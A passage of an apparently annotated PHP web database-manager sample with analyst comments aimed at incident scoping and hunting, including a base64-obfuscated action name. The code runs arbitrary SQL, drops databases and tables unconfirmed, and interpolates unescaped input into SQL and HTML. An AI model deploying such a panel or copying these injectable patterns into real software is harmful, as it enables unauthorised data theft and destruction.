  793.     echo "<input type=text name=dbname>\n";
  794.     echo "<input type=submit value='Create Database'>\n";
  795.     echo "</form>\n";
  796.     echo "<hr>\n";
  797.     echo "<table cellspacing=1 cellpadding=5>\n";
  798.     $pDB = mysql_list_dbs( $mysqlHandle );
  799.     $num = mysql_num_rows( $pDB );
  800.     for( $i = 0; $i < $num; $i++ ) {
  801.         $dbname = mysql_dbname( $pDB, $i );
  802.         echo "<tr>\n";
  803.         echo "<td>$dbname</td>\n";
  804.         echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
  805.         echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
  806.         echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
  807.         echo "</tr>\n";
  808.     }
  809.     echo "</table>\n";
  810. }
  811.  
  812. function createDatabase() {
           // Creates a database named by the global $dbname on the connection in
           // $mysqlHandle, then re-renders the database list. The return value of
           // mysql_create_db() is not checked and $dbname is not validated here.
  813.     global $mysqlHandle, $dbname, $PHP_SELF;
  814.     mysql_create_db( $dbname, $mysqlHandle );
  815.     listDatabases();
  816. }
  817.  
  818. function dropDatabase() {
           // Analyst note: destructive action. Drops the database named by the
           // global $dbname, then re-renders the database list. No server-side
           // confirmation or result check is performed in this function, so a
           // single request with this action is enough to lose the data; check
           // database and web logs for it during incident scoping.
  819.     global $mysqlHandle, $dbname, $PHP_SELF;
  820.     mysql_drop_db( $dbname, $mysqlHandle );
  821.     listDatabases();
  822. }
  823.  
  824. function listTables() {
           // Analyst note: table overview for the database in the global $dbname.
           // Prints the previous query result, a create-table form, and a second
           // form whose queryStr field accepts an arbitrary SQL statement for the
           // action named query.
           // Each table row links to the actions viewSchema, dmlld0RhdGE= (base64
           // of viewData), dropTable and dumpTable. These action values, combined
           // with dbname and tablename parameters, are useful access-log search
           // terms.
           // If mysql_list_tables() fails, the mysql_error() text is printed and
           // the function returns early. Names are written to HTML and URLs
           // without escaping.
  825.     global $mysqlHandle, $dbname, $PHP_SELF;
  826.     echo "<h1>Tables List</h1>\n";
  827.     echo "<p class=location>$dbname</p>\n";
  828.     echoQueryResult();
  829.     echo "<form action='$PHP_SELF'>\n";
  830.     echo "<input type=hidden name=action value=createTable>\n";
  831.     echo "<input type=hidden name=dbname value=$dbname>\n";
  832.     echo "<input type=text name=tablename>\n";
  833.     echo "<input type=submit value='Create Table'>\n";
  834.     echo "</form>\n";
  835.     echo "<form action='$PHP_SELF'>\n";
  836.     echo "<input type=hidden name=action value=query>\n";
  837.     echo "<input type=hidden name=dbname value=$dbname>\n";
  838.     echo "<input type=text size=120 name=queryStr>\n";
  839.     echo "<input type=submit value='Query'>\n";
  840.     echo "</form>\n";
  841.     echo "<hr>\n";
  842.     $pTable = mysql_list_tables( $dbname );
  843.     if( $pTable == 0 ) {
  844.         $msg  = mysql_error();
  845.         echo "<h3>Error : $msg</h3><p>\n";
  846.         return;
  847.     }
  848.     $num = mysql_num_rows( $pTable );
  849.     echo "<table cellspacing=1 cellpadding=5>\n";
  850.     for( $i = 0; $i < $num; $i++ ) {
  851.         $tablename = mysql_tablename( $pTable, $i );
  852.         echo "<tr>\n";
  853.         echo "<td>\n";
  854.         echo "$tablename\n";
  855.         echo "</td>\n";
  856.         echo "<td>\n";
  857.         echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
  858.         echo "</td>\n";
  859.         echo "<td>\n";
  860.         echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
  861.         echo "</td>\n";
  862.         echo "<td>\n";
  863.         echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
  864.         echo "</td>\n";
  865.         echo "<td>\n";
  866.         echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
  867.         echo "</td>\n";
  868.         echo "</tr>\n";
  869.     }
  870.     echo "</table>";
  871. }
  872.  
  873. function createTable() {
           // Creates a table with a single INT column named no. The statement is
           // built by interpolating the global $tablename directly into the SQL
           // text, with no quoting or validation. The statement and any
           // mysql_error() text are kept in $queryStr and $errMsg, which
           // listTables() then displays.
  874.  
  875.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  876.     $queryStr = "CREATE TABLE $tablename ( no INT )";
  877.     mysql_select_db( $dbname, $mysqlHandle );
  878.     mysql_query( $queryStr, $mysqlHandle );
  879.     $errMsg = mysql_error();
  880.     listTables();
  881. }
  882.  
  883. function dropTable() {
           // Analyst note: destructive action. Runs DROP TABLE with the global
           // $tablename interpolated directly into the SQL text, against the
           // database selected from the global $dbname. The statement and any
           // mysql_error() text are kept in $queryStr and $errMsg, which
           // listTables() then displays. Nothing is confirmed on the server side.
  884.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  885.     $queryStr = "DROP TABLE $tablename";
  886.     mysql_select_db( $dbname, $mysqlHandle );
  887.     mysql_query( $queryStr, $mysqlHandle );
  888.     $errMsg = mysql_error();
  889.     listTables();
  890. }
  891.  
  892. function viewSchema() {
           // Analyst note: shows the column definitions of one table.
           // Runs SHOW fields FROM with the global $tablename interpolated into
           // the SQL text through mysql_db_query(), then prints Field, Type, Null,
           // Key, Default and Extra for every row.
           // Links are emitted for the actions addField, dmlld0RhdGE= (base64 of
           // viewData), editField and dropField. The result of mysql_db_query()
           // is not checked before mysql_num_rows() is called, and all values are
           // written to the page without HTML escaping.
  893.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  894.     echo "<h1>Table Schema</h1>\n";
  895.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  896.     echoQueryResult();
  897.     echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
  898.     echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
  899.     echo "<hr>\n";
  900.     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  901.     $num = mysql_num_rows( $pResult );
  902.     echo "<table cellspacing=1 cellpadding=5>\n";
  903.     echo "<tr>\n";
  904.     echo "<th>Field</th>\n";
  905.     echo "<th>Type</th>\n";
  906.     echo "<th>Null</th>\n";
  907.     echo "<th>Key</th>\n";
  908.     echo "<th>Default</th>\n";
  909.     echo "<th>Extra</th>\n";
  910.     echo "<th colspan=2>Action</th>\n";
  911.     echo "</tr>\n";
  912.  
  913.     for( $i = 0; $i < $num; $i++ ) {
  914.         $field = mysql_fetch_array( $pResult );
  915.         echo "<tr>\n";
  916.         echo "<td>".$field["Field"]."</td>\n";
  917.         echo "<td>".$field["Type"]."</td>\n";
  918.         echo "<td>".$field["Null"]."</td>\n";
  919.         echo "<td>".$field["Key"]."</td>\n";
  920.         echo "<td>".$field["Default"]."</td>\n";
  921.         echo "<td>".$field["Extra"]."</td>\n";
  922.         $fieldname = $field["Field"];
  923.         echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
  924.         echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
  925.         echo "</tr>\n";
  926.     }
  927.     echo "</table>\n";
  928. }
  929.  
  930. function manageField( $cmd ) {
  931.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
  932.     if( $cmd == "add" )
  933.         echo "<h1>Add Field</h1>\n";
  934.     else if( $cmd == "edit" ) {
  935.         echo "<h1>Edit Field</h1>\n";
  936.         $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  937.         $num = mysql_num_rows( $pResult );
  938.         for( $i = 0; $i < $num; $i++ ) {
  939.             $field = mysql_fetch_array( $pResult );
  940.             if( $field["Field"] == $fieldname ) {
  941.                 $fieldtype = $field["Type"];
  942.                 $fieldkey = $field["Key"];
  943.                 $fieldextra = $field["Extra"];
  944.                 $fieldnull = $field["Null"];
  945.                 $fielddefault = $field["Default"];
  946.                 break;
  947.             }
  948.         }
  949.  
  950.         $type = strtok( $fieldtype, " (,)\n" );
  951.         if( strpos( $fieldtype, "(" ) ) {
  952.             if( $type == "enum" | $type == "set" ) {
  953.                 $valuelist = strtok( " ()\n" );
  954.             } else {
  955.                 $M = strtok( " (,)\n" );
  956.                 if( strpos( $fieldtype, "," ) )
  957.                     $D = strtok( " (,)\n" );
  958.             }
  959.         }
  960.     }
  961.  
  962.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  963.     echo "<form action=$PHP_SELF>\n";
  964.     if( $cmd == "add" )
  965.         echo "<input type=hidden name=action value=addField_submit>\n";
  966.     else if( $cmd == "edit" ) {
  967.         echo "<input type=hidden name=action value=editField_submit>\n";
  968.         echo "<input type=hidden name=old_name value=$fieldname>\n";
  969.     }
  970.     echo "<input type=hidden name=dbname value=$dbname>\n";
  971.     echo "<input type=hidden name=tablename value=$tablename>\n";
  972.     echo "<h3>Name</h3>\n";
  973.     echo "<input type=text name=name value=$fieldname><p>\n";
  974.     echo '
  975.  
  976. <h3>Type</h3>
  977. <font size=2 class="new">
  978. * `M\' indicates the maximum display size.<br>
  979. * `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
  980. </font>
  981. <table>
  982. <tr>
  983. <th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
  984. </tr>
  985. <tr>
  986. <td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
  987. <td align=center>O</td>
  988. <td>&nbsp</td>
  989. <td align=center>O</td>
  990. <td align=center>O</td>
  991. <td>&nbsp</td>
  992. </tr>
  993. <tr>
  994. <td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
  995. <td align=center>O</td>
  996. <td>&nbsp</td>
  997. <td align=center>O</td>
  998. <td align=center>O</td>
  999. <td>&nbsp</td>
  1000. </tr>
  1001. <tr>
  1002. <td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
  1003. <td align=center>O</td>
  1004. <td>&nbsp</td>
  1005. <td align=center>O</td>
  1006. <td align=center>O</td>
  1007. <td>&nbsp</td>
  1008. </tr>
  1009. <tr>
  1010. <td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
  1011. <td align=center>O</td>
  1012. <td>&nbsp</td>
  1013. <td align=center>O</td>
  1014. <td align=center>O</td>
  1015. <td>&nbsp</td>
  1016. </tr>
  1017. <tr>
  1018. <td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
  1019. <td align=center>O</td>
  1020. <td>&nbsp</td>
  1021. <td align=center>O</td>
  1022. <td align=center>O</td>
  1023. <td>&nbsp</td>
  1024. </tr>
  1025. <tr>
  1026. <td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
  1027. <td align=center>O</td>
  1028. <td align=center>O</td>
  1029. <td>&nbsp</td>
  1030. <td align=center>O</td>
  1031. <td>&nbsp</td>
  1032. </tr>
  1033. <tr>
  1034. <td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
  1035. <td align=center>O</td>
  1036. <td align=center>O</td>
  1037. <td>&nbsp</td>
  1038. <td align=center>O</td>
  1039. <td>&nbsp</td>
  1040. </tr>
  1041. <tr>
  1042. <td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
  1043. <td align=center>O</td>
  1044. <td align=center>O</td>
  1045. <td>&nbsp</td>
  1046. <td align=center>O</td>
  1047. <td>&nbsp</td>
  1048. </tr>
  1049. <tr>
  1050. <td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
  1051. <td>&nbsp</td>
  1052. <td>&nbsp</td>
  1053. <td>&nbsp</td>
  1054. <td>&nbsp</td>
  1055. <td>&nbsp</td>
  1056. </tr>
  1057. <tr>
  1058. <td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
  1059. <td>&nbsp</td>
  1060. <td>&nbsp</td>
  1061. <td>&nbsp</td>
  1062. <td>&nbsp</td>
  1063. <td>&nbsp</td>
  1064. </tr>
  1065. <tr>
  1066. <td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
  1067. <td align=center>O</td>
  1068. <td>&nbsp</td>
  1069. <td>&nbsp</td>
  1070. <td>&nbsp</td>
  1071. <td>&nbsp</td>
  1072. </tr>
  1073. <tr>
  1074. <td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
  1075. <td>&nbsp</td>
  1076. <td>&nbsp</td>
  1077. <td>&nbsp</td>
  1078. <td>&nbsp</td>
  1079. <td>&nbsp</td>
  1080. </tr>
  1081. <tr>
  1082. <td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
  1083. <td>&nbsp</td>
  1084. <td>&nbsp</td>
  1085. <td>&nbsp</td>
  1086. <td>&nbsp</td>
  1087. <td>&nbsp</td>
  1088. </tr>
  1089. <tr>
  1090. <td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
  1091. <td align=center>O</td>
  1092. <td>&nbsp</td>
  1093. <td>&nbsp</td>
  1094. <td>&nbsp</td>
  1095. <td align=center>O</td>
  1096. </tr>
  1097. <tr>
  1098. <td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
  1099. <td align=center>O</td>
  1100. <td>&nbsp</td>
  1101. <td>&nbsp</td>
  1102. <td>&nbsp</td>
  1103. <td align=center>O</td>
  1104. </tr>
  1105. <tr>
  1106. <td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
  1107. <td>&nbsp</td>
  1108. <td>&nbsp</td>
  1109. <td>&nbsp</td>
  1110. <td>&nbsp</td>
  1111. <td>&nbsp</td>
  1112. </tr>
  1113. <tr>
  1114. <td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
  1115. <td>&nbsp</td>
  1116. <td>&nbsp</td>
  1117. <td>&nbsp</td>
  1118. <td>&nbsp</td>
  1119. <td>&nbsp</td>
  1120. </tr>
  1121. <tr>
  1122. <td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
  1123. <td>&nbsp</td>
  1124. <td>&nbsp</td>
  1125. <td>&nbsp</td>
  1126. <td>&nbsp</td>
  1127. <td>&nbsp</td>
  1128. </tr>
  1129. <tr>
  1130. <td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
  1131. <td>&nbsp</td>
  1132. <td>&nbsp</td>
  1133. <td>&nbsp</td>
  1134. <td>&nbsp</td>
  1135. <td>&nbsp</td>
  1136. </tr>
  1137. <tr>
  1138. <td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
  1139. <td>&nbsp</td>
  1140. <td>&nbsp</td>
  1141. <td>&nbsp</td>
  1142. <td>&nbsp</td>
  1143. <td>&nbsp</td>
  1144. </tr>
  1145. <tr>
  1146. <td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
  1147. <td>&nbsp</td>
  1148. <td>&nbsp</td>
  1149. <td>&nbsp</td>
  1150. <td>&nbsp</td>
  1151. <td>&nbsp</td>
  1152. </tr>
  1153. <tr>
  1154. <td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
  1155. <td>&nbsp</td>
  1156. <td>&nbsp</td>
  1157. <td>&nbsp</td>
  1158. <td>&nbsp</td>
  1159. <td>&nbsp</td>
  1160. </tr>
  1161. <tr>
  1162. <td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
  1163. <td>&nbsp</td>
  1164. <td>&nbsp</td>
  1165. <td>&nbsp</td>
  1166. <td>&nbsp</td>
  1167. <td>&nbsp</td>
  1168. </tr>
  1169. <tr>
  1170. <td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
  1171. <td colspan=5><center>value list</center></td>
  1172. </tr>
  1173. <tr>
  1174. <td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
  1175. <td colspan=5><center>value list</center></td>
  1176. </tr>
  1177. </table>
  1178. <table>
  1179. <tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
  1180. <tr>
  1181. <td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
  1182. <td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
  1183. <td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
  1184. <td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
  1185. <td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
  1186. <td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
  1187. </tr>
  1188. </table>
  1189. <h3>Flags</h3>
  1190. <table>
  1191. <tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
  1192. <tr>
  1193. <td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
  1194. <td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
  1195. <td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
  1196. <td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
  1197. </tr>
  1198. </table>
  1199. <p>';
  1200.     if( $cmd == "add" )
  1201.         echo "<input type=submit value='Add Field'>\n";
  1202.     else if( $cmd == "edit" )
  1203.         echo "<input type=submit value='Edit Field'>\n";
  1204.     echo "<input type=button value=Cancel onClick='history.back()'>\n";
  1205.     echo "</form>\n";
  1206. }
  1207.  
  1208. function manageField_submit( $cmd ) {
            // Adds ($cmd == "add") or changes ($cmd == "edit") one column with a single
            // ALTER TABLE statement, then rebuilds the primary key when this column's
            // membership in it changed, and finally calls viewSchema().
            // All inputs are read from globals; nothing in this function sets or validates
            // them -- presumably they are request parameters (confirm at the dispatcher).
            // NOTE(review): $tablename, $name, $old_name, $type, $M, $D, $valuelist and
            // $default_value are concatenated into the SQL text without escaping.
  1209.     global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
  1210.         $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
            // For any other $cmd value $queryStr is not assigned here and keeps whatever
            // the global already held before the .= appends below.
  1211.     if( $cmd == "add" )
  1212.         $queryStr = "ALTER TABLE $tablename ADD $name ";
  1213.     else if( $cmd == "edit" )
  1214.         $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
            // Type clause: type(M,D), type(M), type(valuelist) or the bare type.
            // The brace-less nesting matters: the first `else` pairs with `if( $D ... )`,
            // the `else if( $valuelist ... )` pairs with `if( $M ... )`.
  1215.     if( $M != "" )
  1216.         if( $D != "" )
  1217.             $queryStr .= "$type($M,$D) ";
  1218.         else
  1219.             $queryStr .= "$type($M) ";
  1220.     else if( $valuelist != "" ) {
                // Backslashes are removed so the quoted ENUM/SET members reach MySQL as typed
                // (presumably undoing magic-quotes escaping -- confirm).
  1221.         $valuelist = stripslashes( $valuelist );
  1222.         $queryStr .= "$type($valuelist) ";
  1223.     } else
  1224.         $queryStr .= "$type ";
            // Attribute keywords come straight from the form values of the same name.
  1225.     $queryStr .= "$unsigned $zerofill $binary ";
  1226.     if( $default_value != "" )
  1227.         $queryStr .= "DEFAULT '$default_value' ";
  1228.     $queryStr .= "$not_null $auto_increment";
  1229.     mysql_select_db( $dbname, $mysqlHandle );
  1230.     mysql_query( $queryStr, $mysqlHandle );
  1231.     $errMsg = mysql_error();
  1232.     // key change
            // Walk the current keys: $keyChange becomes true if $name is already part of the
            // PRIMARY key; every other primary-key column is collected into $primary.
  1233.     $keyChange = false;
  1234.     $result = mysql_query( "SHOW KEYS FROM $tablename" );
  1235.     $primary = "";
  1236.     while( $row = mysql_fetch_array($result) )
  1237.         if( $row["Key_name"] == "PRIMARY" ) {
                    // Column_name is written as a bare word, not a quoted string key.
  1238.             if( $row[Column_name] == $name )
  1239.                 $keyChange = true;
  1240.             else
  1241.                 $primary .= ", $row[Column_name]";
  1242.         }
            // If the form asked for PRIMARY KEY, add the column and flip the flag, so the
            // flag ends up true only when requested and current membership differ.
  1243.     if( $primary_key == "PRIMARY KEY" ) {
  1244.         $primary .= ", $name";
  1245.         $keyChange = !$keyChange;
  1246.     }
            // Drop the leading ", " separator.
  1247.     $primary = substr( $primary, 2 );
  1248.     if( $keyChange == true ) {
                // Drop and re-create the key. The second statement is sent even when
                // $primary is empty; each statement and its error text are appended
                // to the globals $queryStr / $errMsg.
  1249.         $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
  1250.         mysql_query( $q );
  1251.         $queryStr .= "<br>\n" . $q;
  1252.         $errMsg .= "<br>\n" . mysql_error();
  1253.         $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
  1254.         mysql_query( $q );
  1255.         $queryStr .= "<br>\n" . $q;
  1256.         $errMsg .= "<br>\n" . mysql_error();
  1257.     }
  1258.     viewSchema();
  1259. }
  1260.  
  1261. function dropField() {
            // Drops the column named by the global $fieldname from the global $tablename,
            // stores the statement and the MySQL error text in the globals $queryStr and
            // $errMsg, then calls viewSchema().
            // NOTE(review): both identifiers are interpolated into the statement as-is;
            // there is no confirmation step or validation inside this function.
  1262.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1263.     $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
  1264.     mysql_select_db( $dbname, $mysqlHandle );
  1265.     mysql_query( $queryStr , $mysqlHandle );
  1266.     $errMsg = mysql_error();
  1267.     viewSchema();
  1268. }
  1269.  
  1270. function viewData( $queryStr ) {
            // Runs $queryStr against $dbname and renders the result as a paged HTML table
            // with per-row Edit/Delete links. With an empty $queryStr it browses the whole
            // table: SELECT * FROM $tablename, optionally ORDER BY $orderby.
            // $queryStr: SQL text to run; the "query" action passes it in unchanged, so this
            // is an arbitrary-SQL execution path.
            // Returns nothing; output is echoed. Failures and statements without a result
            // set are reported through echoQueryResult().
            // NOTE(review): the action value "dmlld0RhdGE=" compared below is the base64
            // encoding of "viewData"; it is compared in encoded form and never decoded here.
            // Such constants are stable strings to match on when hunting for this sample.
  1271.     global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
  1272.     echo "<h1>Data in Table</h1>\n";
  1273.     if( $tablename != "" )
  1274.         echo "<p class=location>$dbname &gt; $tablename</p>\n";
  1275.     else
  1276.         echo "<p class=location>$dbname</p>\n";
            // Backslashes are stripped from the submitted SQL before it is executed.
  1277.     $queryStr = stripslashes( $queryStr );
  1278.     if( $queryStr == "" ) {
  1279.         $queryStr = "SELECT * FROM $tablename";
  1280.         if( $orderby != "" )
  1281.             $queryStr .= " ORDER BY $orderby";
  1282.         echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
  1283.         echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
  1284.     }
  1285.     $pResult = mysql_db_query( $dbname, $queryStr );
            // The first column's metadata is read before $pResult is checked for failure,
            // and the global $tablename is overwritten with the table it reports.
  1286.     $fieldt = mysql_fetch_field($pResult);
  1287.     $tablename = $fieldt->table;
  1288.     $errMsg = mysql_error();
            // Publishes the executed SQL in the global $queryStr (bare-word array key);
            // presumably echoQueryResult() reads it -- confirm there.
  1289.     $GLOBALS[queryStr] = $queryStr;
  1290.     if( $pResult == false ) {
  1291.         echoQueryResult();
  1292.         return;
  1293.     }
            // Loose comparison with 1: presumably matches the boolean TRUE returned for
            // statements that produce no result set (INSERT/UPDATE/DDL) -- confirm.
  1294.     if( $pResult == 1 ) {
  1295.         $errMsg = "Success";
  1296.         echoQueryResult();
  1297.         return;
  1298.     }
  1299.     echo "<hr>\n";
  1300.     $row = mysql_num_rows( $pResult );
  1301.     $col = mysql_num_fields( $pResult );
  1302.     if( $row == 0 ) {
  1303.         echo "No Data Exist!";
  1304.         return;
  1305.     }
            // Paging: 30 rows per page by default; $page is 1-based in the request and
            // converted to 0-based here before seeking to the page's first row.
  1306.     if( $rowperpage == "" ) $rowperpage = 30;
  1307.     if( $page == "" ) $page = 0;
  1308.     else $page--;
  1309.     mysql_data_seek( $pResult, $page * $rowperpage );
  1310.     echo "<table cellspacing=1 cellpadding=2>\n";
  1311.     echo "<tr>\n";
            // Header row; in table-browse mode each column name links to an ORDER BY view.
  1312.     for( $i = 0; $i < $col; $i++ ) {
  1313.         $field = mysql_fetch_field( $pResult, $i );
  1314.         echo "<th>";
  1315.         if($action == "dmlld0RhdGE=")
  1316.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
  1317.         else
  1318.             echo $field->name."\n";
  1319.         echo "</th>\n";
  1320.     }
  1321.     echo "<th colspan=2>Action</th>\n";
  1322.     echo "</tr>\n";
  1323.     for( $i = 0; $i < $rowperpage; $i++ ) {
  1324.         $rowArray = mysql_fetch_row( $pResult );
  1325.         if( $rowArray == false ) break;
  1326.         echo "<tr>\n";
                // $key collects "&column=value" for every primary-key column; it is built
                // from the raw cell value, before truncation and HTML escaping, and is
                // placed into the Edit/Delete URLs below without URL encoding.
  1327.         $key = "";
  1328.         for( $j = 0; $j < $col; $j++ ) {
  1329.             $data = $rowArray[$j];
  1330.             $field = mysql_fetch_field( $pResult, $j );
  1331.             if( $field->primary_key == 1 )
  1332.                 $key .= "&" . $field->name . "=" . $data;
                    // Cells are cut to 30 characters for display, then HTML-escaped.
  1333.             if( strlen( $data ) > 30 )
  1334.                 $data = substr( $data, 0, 30 ) . "...";
  1335.             $data = htmlspecialchars( $data );
  1336.             echo "<td>\n";
  1337.             echo "$data\n";
  1338.             echo "</td>\n";
  1339.         }
  1340.         if( $key == "" )
  1341.             echo "<td colspan=2>no Key</td>\n";
  1342.         else {
  1343.             echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
  1344.             echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
  1345.         }
  1346.         echo "</tr>\n";
  1347.     }
  1348.     echo "</table>\n";
  1349.     echo "<font size=2 class=\"new\">\n";
            // Pager form: in free-query mode the SQL text itself travels in the form action
            // and in the Prev/Next URLs (queryStr=...), unescaped.
  1350.     if($action == "dmlld0RhdGE=")
  1351.         echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
  1352.     else
  1353.         echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
  1354.     echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
  1355.     echo "</font>\n";
  1356.     echo " | ";
            // $page is 0-based here, so the 1-based previous page number is $page itself
            // and the next page number is $page+2.
  1357.     if( $page > 0 ) {
  1358.         if($action == "dmlld0RhdGE=")
  1359.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
  1360.         else
  1361.             echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
  1362.         if( $orderby != "" && $action == "dmlld0RhdGE=")
  1363.             echo "&orderby=$orderby";
